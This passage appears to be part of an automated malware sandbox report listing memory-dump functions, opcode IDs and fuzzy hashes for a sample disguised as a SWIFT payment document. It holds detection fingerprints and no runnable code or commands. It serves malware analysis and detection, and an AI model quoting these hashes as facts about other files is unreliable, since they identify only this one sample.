Instruction Fuzzy Hash: 32E02270E09308AFCB00DB74ED44A6ABFB6EB46200F1040E8D8049B240E8790E048791

Function 060C2999 Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

T, xrefs: 060C29ED

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: T
API String ID: 0-3187964512
Opcode ID: 80eb64f6791af86fc9e89f219a6f0d82ed5e92ea4ae1e9ea0228e24f8e69739a
Instruction ID: 52c71ec35d318113ae3add23a2617a5c63e2e29d0d6ffd0bb788c042d5033dd8
Opcode Fuzzy Hash: 80eb64f6791af86fc9e89f219a6f0d82ed5e92ea4ae1e9ea0228e24f8e69739a
Instruction Fuzzy Hash: 85F0AFB0D1022CCFDBA5CF28D984BDDBAB4BB09314F0049A99609B3240D7759BC58F95

Function 064A1A32 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

u, xrefs: 064A2DF6

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-4067256894
Opcode ID: 79ab298d36a58aa5fa50026fb1d3799bfc1c30c2a9d054995ff2d8adcfa0a0b3
Instruction ID: b3378fd4ea7f30eb56d1e7cc814f72809e539566151a7ed7e36bb7b4d23aa34b
Opcode Fuzzy Hash: 79ab298d36a58aa5fa50026fb1d3799bfc1c30c2a9d054995ff2d8adcfa0a0b3
Instruction Fuzzy Hash: DBE06D74A10108AFD764DB54E884AFD77B2EFC9311F4040A9910AA7690DE785DD1CF50

Function 060C90DA Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

P, xrefs: 060C8528

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: b4d0ebc75317d40c895192ce187b3fe59c7e39e7b825b2132f095117f54698aa
Instruction ID: 2c5cbda0dbbfa8bb7d4d5f15a4b0595e9a6d5e5272b94fd5431ea1d63e7d4832
Opcode Fuzzy Hash: b4d0ebc75317d40c895192ce187b3fe59c7e39e7b825b2132f095117f54698aa
Instruction Fuzzy Hash: 9AE0B675945319CFEB65CF14DC48B9E7BB4FB45319F009199910A62194D7B44EC8CF41

Function 060C8504 Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

P, xrefs: 060C8528

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 288d04d6df4a36435833e8533f222f12cd22cf6c507a96f7df2e4d0399792347
Instruction ID: e3ab93b376a729b6b936a052f066aaac0cc8130522f1cd1ab5cb38262bf38516
Opcode Fuzzy Hash: 288d04d6df4a36435833e8533f222f12cd22cf6c507a96f7df2e4d0399792347
Instruction Fuzzy Hash: 59D09275945719CFDB25CF24DC44B9E7B74FB49305F0096949209A3258D7745E848F40

Function 060C3366 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0777181d1f42e4722d64e09456c40e527ed8c2d241ecfd5d2982a7902cfb13a7
Instruction ID: 3727aaa0f04732572649fd8003929599fd773272b0516340b6b8f88be669afb4
Opcode Fuzzy Hash: 0777181d1f42e4722d64e09456c40e527ed8c2d241ecfd5d2982a7902cfb13a7
Instruction Fuzzy Hash: 9CA12774D64258CFDB99DFA8D8446ADBBF5FF49320F108529E415AB380CB385981CF90

Function 060B8BB0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 576e0418d1cb58bba5bda302d23fcd798a6f23ca3e56136cee6731909db3a342
Instruction ID: 76a979fbd5a55c4ee83d147ffad13869f24065804e410931f6be35f6d563ff1a
Opcode Fuzzy Hash: 576e0418d1cb58bba5bda302d23fcd798a6f23ca3e56136cee6731909db3a342
Instruction Fuzzy Hash: F581F775A40618CFCB64DF68C484A9DBBF9FF88710B1585AAE8169B374DB30ED41CB90

Function 060BBE78 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210ddeb0f9c63e5dfdcbbb500c92109413b04f4300f39dbd3047438715bbadad
Instruction ID: eea7ef4aba12f702cef02b2a8fe75792fca3b850404d6f49115b8e90ffc58173
Opcode Fuzzy Hash: 210ddeb0f9c63e5dfdcbbb500c92109413b04f4300f39dbd3047438715bbadad
Instruction Fuzzy Hash: 24514334B9051A9FCB18DF64E458AAEBBB6FFC8711F108119E50297364DF38A946CF81

Function 060C75B9 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f33af0451109ea9f3e51dd11c5267844644d3dd4cfbd70971ba0a5c517eee8
Instruction ID: c9b0beec3e3bc882bde9f74bdb09029c1a395bb65d47a0a9023c1e892e0539b1
Opcode Fuzzy Hash: 82f33af0451109ea9f3e51dd11c5267844644d3dd4cfbd70971ba0a5c517eee8
Instruction Fuzzy Hash: 5951D074D01208DFDB68DFB9D984AEDBBB2BF88310F20912ED416AB260DB359945CF50

Function 060BEA50 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1a3d8a4131c19104fd693a0937900d5773953a6869764eb506805c9aa2ea81
Instruction ID: 8bb2fe8cf737b30548784e338a1e37389ae7af901a0155eb4bf70155e1f64427
Opcode Fuzzy Hash: 2b1a3d8a4131c19104fd693a0937900d5773953a6869764eb506805c9aa2ea81
Instruction Fuzzy Hash: 9E310836A501049FCB49CF58D998E99BBB2FF48320B1680A8E50AAF372C731ED55CB40

Function 060B3B18 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f91a76ab9995bf0de37259b0749d52e4fa0033ca1216783daf01ee69ff46d32c
Instruction ID: f191c3e5e19e676b42e9eaae11b2e9dc987f6ee401d593746078767949575263
Opcode Fuzzy Hash: f91a76ab9995bf0de37259b0749d52e4fa0033ca1216783daf01ee69ff46d32c
Instruction Fuzzy Hash: EF418B71E4062A8FDB98CFA5C844AAEBFF1FF88341F20846AD505E7250D738D945CB91

Function 060B44D0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112c6d4ade24a97b372f8434664eb3106534687e43bd3842f285c97930e2a849
Instruction ID: 09cf4e702e0931255e76a581451c04aaaab8690c3d110c9c2e54a46c4bb37eff
Opcode Fuzzy Hash: 112c6d4ade24a97b372f8434664eb3106534687e43bd3842f285c97930e2a849
Instruction Fuzzy Hash: 2F410434A512248FEBA4CB24CC90FD9BBF1BF59210F1051E5EA09AB392C631AE81CF50

Function 060CE418 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b515127909eb238e3efdb64c7b520666cdc86fa1d4e771f3ea3dee84de646e2f
Instruction ID: 2a5bea05c8c93be91d5c5201f1a95e834483ad45584ed2cbbe6c9b5fc1bf53c7
Opcode Fuzzy Hash: b515127909eb238e3efdb64c7b520666cdc86fa1d4e771f3ea3dee84de646e2f
Instruction Fuzzy Hash: 5831DE74E45218CFDB44CFA9D844AAEBBF5BB89320F108069E915A7250D7745A44CB91

Function 060BCC18 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4efadd3418a81a074bac7e55b499a1437718f21bb61541ec5bc408fb61409d7f
Instruction ID: 47208dc234b994fae159a5f8720f77b4c2a0bdd39fd78ec26f0de1b1bb0d20ec
Opcode Fuzzy Hash: 4efadd3418a81a074bac7e55b499a1437718f21bb61541ec5bc408fb61409d7f
Instruction Fuzzy Hash: DD21B3323452009FD3A49B69E884AA6BFE9EFD1321B15C8BAE54DC7651DB30EC41C7A1

Function 060CF910 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7db5caef90cdb7d38a1fc23cbf3427da054fdd02383cb5303192b9e77216f0c9
Instruction ID: 9faf4d9b68b6eb14ac8adb0cb1767afddb57e197cd50d37c600643146b1cacdb
Opcode Fuzzy Hash: 7db5caef90cdb7d38a1fc23cbf3427da054fdd02383cb5303192b9e77216f0c9
Instruction Fuzzy Hash: 523102B4E1420A9FDB49CFA9D8446AEBBF2FF89310F20C069C615A7354DB385A41CF91

Function 060B86D0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196b83662a8e18baa9f331ee54c40b0314528f1e79ee84ba4c5e8c975d00bfc2
Instruction ID: f940ac71618642743952865240c64496f9dffcc0aced78603800f5aa30a29371
Opcode Fuzzy Hash: 196b83662a8e18baa9f331ee54c40b0314528f1e79ee84ba4c5e8c975d00bfc2
Instruction Fuzzy Hash: 0C316A313802059FDB958F29C884AEA7FEAEF88344F14C169F9058B2B1CB75D895CB90

Function 060B8B50 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51435943d39ced8ed2e7109fcf8df0d54c5c0a177a43b88e4ece7957a3f73b4d
Instruction ID: cf6fdbdc5cd36a5373c1ae36a3d872e82e0568cf5b532268bacaf757c4578bbd
Opcode Fuzzy Hash: 51435943d39ced8ed2e7109fcf8df0d54c5c0a177a43b88e4ece7957a3f73b4d
Instruction Fuzzy Hash: F921F9B2A042489FC725DFA4D8548DEFFF9EF89300F14856BE585DB261E630AD06CB51

Function 060B0F99 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d336843330833c926fbdb40083dc6504d3bde35e40dad91d6b94f15fd92c76c
Instruction ID: ea9ab52bb8df99e482c592d8d6fe20c658cbfb0f737ffda82b5443f891416887
Opcode Fuzzy Hash: 4d336843330833c926fbdb40083dc6504d3bde35e40dad91d6b94f15fd92c76c
Instruction Fuzzy Hash: 3C3112B4E55248EFDB84DFA9D8546EDBBF1EF89300F14D4AAC418A3251D7B84A91CF40

Function 060B22DB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8916036b853f3355806d1c1cf0045e484f361ba5581d48ef7c7242f26d53c49d
Instruction ID: e66000a7618f1b3512ab3b5b1bf52e68294f2ece8bdeabb57348049dca1206e6
Opcode Fuzzy Hash: 8916036b853f3355806d1c1cf0045e484f361ba5581d48ef7c7242f26d53c49d
Instruction Fuzzy Hash: 1C219531A40219DFCB198F69C8549EEBFB6EF8D720F248129E511A7390CB759981CF91

Function 060B5FA0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3638a3013ca4a04f4ea01da6cdc9ab476ff11ce65cd33e673088e3c11d404c96
Instruction ID: 05a93277f24d7bca4b8b0147aa8cb4c1459e6db0b62c9edf85fd8d3c26e44541
Opcode Fuzzy Hash: 3638a3013ca4a04f4ea01da6cdc9ab476ff11ce65cd33e673088e3c11d404c96
Instruction Fuzzy Hash: 50211671E6020A9FEB90DEA9C944BEFBBF5AB04340F10D0A6D915D7290E635CA50CB91

Function 0124D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2319835287.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_124d000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c6611bd0769b4d6d64d05f385ed8537ce0912e0f6da6cd51f1147bdaaaa717
Instruction ID: 3003c4b99c17d4054f5648bc051dd70fee4282103717cd5ad799e148758da772
Opcode Fuzzy Hash: 98c6611bd0769b4d6d64d05f385ed8537ce0912e0f6da6cd51f1147bdaaaa717
Instruction Fuzzy Hash: 80212271114248DFCB19DF58D9C4B26BFA5FB94324F20C569EA090B346C376D81BCAA2

Function 060B1C5F Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e30dd5ccf12526021eeffa1f92ff8d00d3ffecfe15c897e393d653523fe1b30
Instruction ID: 86ed905400903e1f35c51e17d9c14431a78fa62b895ef82ca473126bcdf05b3a
Opcode Fuzzy Hash: 4e30dd5ccf12526021eeffa1f92ff8d00d3ffecfe15c897e393d653523fe1b30
Instruction Fuzzy Hash: FC21D3702502125FCB54DF68D8557AFBFE6EF89300F108829D14AD7285DEB69A098BA0

Function 060BA0B8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b890974ccb26030fd691d19e4725635ac8802a0334ca4832532d0bee65f9038d
Instruction ID: 75dc9009be991b646de705cc93c46eaedd95ad2f112a92e4f231f76ff02138aa
Opcode Fuzzy Hash: b890974ccb26030fd691d19e4725635ac8802a0334ca4832532d0bee65f9038d
Instruction Fuzzy Hash: 9721E831A502098FDB54DF58C944ADDBBF2FF88300F2045A5D505AB3A5CB759E45CBA0

Function 060C7C60 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb055621814f098e05269ce09ab7b8876f8787085dc56d87f2efd85554d9b7a4
Instruction ID: 752e9b60fc08fe036b307a296bbacdbbf0e8e3d52d4420f154bdeaa4de7d18c3
Opcode Fuzzy Hash: bb055621814f098e05269ce09ab7b8876f8787085dc56d87f2efd85554d9b7a4
Instruction Fuzzy Hash: BA2107B4E4420ADFCB94DFA9D4856BEBBB1FB88320F2485A9C415A7240D7389981CF91

Function 0124D006 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2319835287.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_124d000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e168494f684e416c5108f6f753ee8d8b6c0fa62631e31ad7d1678da08921063
Instruction ID: c12eef7588b6653633376d1c6a5a701152f4ec64e1a7078db4918635daecf20f
Opcode Fuzzy Hash: 9e168494f684e416c5108f6f753ee8d8b6c0fa62631e31ad7d1678da08921063
Instruction Fuzzy Hash: 0321CF714083848FCB07CF54D984B16BF71FB86310F2985EAD9458B267C33AD81ACBA2

Function 060C6D10 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35c3d734db9b0c54d1f88da2d972a2901a0768d1fbbbf8ecad7f03c240dc1639
Instruction ID: d386032d4eb459e9b1b8a24348f509ef9ae6c143fe436a26f73988ebd1babe97
Opcode Fuzzy Hash: 35c3d734db9b0c54d1f88da2d972a2901a0768d1fbbbf8ecad7f03c240dc1639
Instruction Fuzzy Hash: 2D213974E50218CFEBA8CF2AD844B9DBBF2AF89310F00C0AAD40DA7255CB750984CF41

Function 064B9EF0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88dc43aaedb66975f6dd5b47d9d6f71556eff8448a7c6dfddf916ebe625a5afb
Instruction ID: f178ded79de9ec7d303037a3e197ac960ab87958844ff464f36a8328bfef1776
Opcode Fuzzy Hash: 88dc43aaedb66975f6dd5b47d9d6f71556eff8448a7c6dfddf916ebe625a5afb
Instruction Fuzzy Hash: D5211A70D04209DFDB84DFAAC9446EEBBF6AB8A310F14E466E51DE3205E7348A41CF94

Function 060B6371 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e871f2067df8c9db3993cb77b36d3a950dd870e51b15daa9eff02049ab670631
Instruction ID: a69dbb3fab9dbeb55732df246b774465ff15ba458381f5a88c6c67def072ebda
Opcode Fuzzy Hash: e871f2067df8c9db3993cb77b36d3a950dd870e51b15daa9eff02049ab670631
Instruction Fuzzy Hash: 9411033199C3849FCB569B60CC116DE7FF5AF4A600F1998AFD481BB282D6765804C7A2

Function 060B2D58 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d32526ea3d3e4eeff4f84a34b669c2c43130d676bee96d20f7a1cdb92c6c466
Instruction ID: 226ec72e6fa90f4e24af4eb549e6b9b31d3c99d47bb74864f9dd824e80d1bb04
Opcode Fuzzy Hash: 1d32526ea3d3e4eeff4f84a34b669c2c43130d676bee96d20f7a1cdb92c6c466
Instruction Fuzzy Hash: 70216035A41209EFDB14CFA8E994AEEBFF5EF88310F208529E401B7394D7309A41CB90

Function 060B30A0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b050ea9b14839e7c09a826848cf0fcf1d89ec05c3543a0218e417053c22f6d1
Instruction ID: 85f435fdbc26c218db26778d5a5e693e6ed1119cfbb1ec72b515185814f25267
Opcode Fuzzy Hash: 2b050ea9b14839e7c09a826848cf0fcf1d89ec05c3543a0218e417053c22f6d1
Instruction Fuzzy Hash: 9A117331B902159FCBA89F6988157EE7FF6EF88710F248429E515D7380DA75C941CBA0

Function 060B2E09 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ebdd537a58e66c363a42253fc2e812b41b0ae1699368a34c558017553745ae
Instruction ID: 6cccd406bd390fd958b92fd14199f62ddc5d4f10972b83088cb4c404e5fd192b
Opcode Fuzzy Hash: 59ebdd537a58e66c363a42253fc2e812b41b0ae1699368a34c558017553745ae
Instruction Fuzzy Hash: F2219E79A42219EFCB44CFA8D594EADBBF2BF49700F204158E816AB360DB34AD41CF50

Function 060B0AB0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e959b03fe30d54b3e3a20eae1c06f28a9d7933dffcd933f899356f23a0718243
Instruction ID: ee4d89c73b20fa2389299f160353555dee63091eb3a7df75ae7fc1e2ff17d596
Opcode Fuzzy Hash: e959b03fe30d54b3e3a20eae1c06f28a9d7933dffcd933f899356f23a0718243
Instruction Fuzzy Hash: 2611CE3084E284EFC752DFB0D8149EEBFB49F46200F1484DBC8C597253D6354946DB92

Function 060BBE68 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47b69189994052f341024f8a02334dfef290a829b0d15719637051d6165a038
Instruction ID: 903afc964dee20593ebe21e44cda2a0bfa42ffd8e9b314ac8b13853e73399ecb
Opcode Fuzzy Hash: e47b69189994052f341024f8a02334dfef290a829b0d15719637051d6165a038
Instruction Fuzzy Hash: 6D01D8367501049FC7149B19E8599EABBAAEFC9225B0480B7FE54D7331DF319812DB90

Function 060CEA88 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d4d15a07f856b1ee5d9b31696e26c19ecdfa7ac8339dee3fbb9690f4b45ecca
Instruction ID: 3ef676b183ec59db8c9c3277ad53ff49f16850213e41a30d92777456f5cd7736
Opcode Fuzzy Hash: 9d4d15a07f856b1ee5d9b31696e26c19ecdfa7ac8339dee3fbb9690f4b45ecca
Instruction Fuzzy Hash: 7D211774D54208DFDB99CF69D8447EDBBB2FF89310F0084A9D619A7240CBB46984CF40

Function 060B3D40 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 131f2bf27ad8090f3bf7f0fc2f1abbe1a516fbd72b440b9db127dd4fdd6aede6
Instruction ID: ee69d23e6012175be448d72bdc463d447b1ec3b4a4dee02ccb481a68dbdc9c98
Opcode Fuzzy Hash: 131f2bf27ad8090f3bf7f0fc2f1abbe1a516fbd72b440b9db127dd4fdd6aede6
Instruction Fuzzy Hash: 6F01B5327442586FD798DA98F040ADAFFF4EB55221F24C1ABE484C7250E631E980C750

Function 060B2CE8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

